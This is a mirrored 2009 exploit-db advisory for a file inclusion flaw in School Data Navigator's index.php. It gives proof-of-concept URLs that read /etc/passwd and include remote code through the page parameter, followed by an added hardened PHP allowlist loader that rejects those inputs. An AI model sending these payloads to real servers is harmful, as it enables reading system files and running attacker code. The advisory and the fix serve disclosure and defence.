exploit-db-mirror/exploits/php/webapps/8924.txt

----------------------------------------------------------------------------------------------------
Name : School Data Navigator
Site : http://sourceforge.net/projects/school-data-nav/
Down : http://216.92.6.173/data_navigator/app_and_readme.zip
----------------------------------------------------------------------------------------------------
Found By : br0ly
Made in : Brasil
Contact : br0ly[dot]Code[at]gmail[dot]com
----------------------------------------------------------------------------------------------------
Description:
Bug : Local/Remote File Inclusion
See index.php:48: require($page); The variable $page is not properly declared before it is used.
If allow_url_fopen=on --> RFI;
If magic_quotes_gpc=off --> LFI;
----------------------------------------------------------------------------------------------------
P0c:
LFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=/etc/passwd
RFI: http://localhost/Scripts/app_and_readme/navigator/index.php?page=[EVIL_CODE]
Note: requires register_globals=on;
----------------------------------------------------------------------------------------------------
# milw0rm.com [2009-06-10]
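
Added example (not code from the application or from the original advisory): the `require($page)` pattern reported at index.php:48, next to a hardened loader that reads the parameter explicitly and resolves it through a fixed allowlist. The page names, the `pages/` directory and `resolve_page()` are hypothetical, and the inputs in the CLI branch are constructed.

```php
<?php
// Added example, not code from School Data Navigator.
// Pattern reported at index.php:48, shown only as a comment:
//     require($page);  // $page is never set by the script, so with
//                      // register_globals=on it comes from ?page=
//
// Hardened form: take the value from $_GET explicitly and use it only
// as a key into a fixed map, so request data never becomes a path.

// Hypothetical page names and files; substitute the application's own.
const PAGES = [
    'home'     => 'home.php',
    'students' => 'students.php',
    'reports'  => 'reports.php',
];
const PAGE_DIR = __DIR__ . '/pages';   // assumed directory layout

/**
 * Return the file to include for a requested page, or null if the
 * request does not name a known page.
 */
function resolve_page($requested): ?string
{
    // Non-strings (?page[]=x) and anything that is not an exact key
    // are rejected: absolute paths, "../" sequences and URLs never match.
    if (!is_string($requested) || !array_key_exists($requested, PAGES)) {
        return null;
    }
    return PAGE_DIR . '/' . PAGES[$requested];
}

if (PHP_SAPI === 'cli') {
    // Constructed inputs: one valid key, the LFI value from the PoC
    // section, a placeholder URL, and an array-typed parameter.
    $samples = ['home', '/etc/passwd', 'http://example.invalid/x.txt', ['a']];
    foreach ($samples as $in) {
        printf("%-34s => %s\n", json_encode($in), resolve_page($in) ?? 'rejected');
    }
} else {
    $file = resolve_page($_GET['page'] ?? 'home');
    if ($file === null) {
        http_response_code(404);
        exit('Unknown page');
    }
    require $file;
}
```

Because the include target is chosen from constants, the result does not depend on allow_url_fopen, magic_quotes_gpc or register_globals.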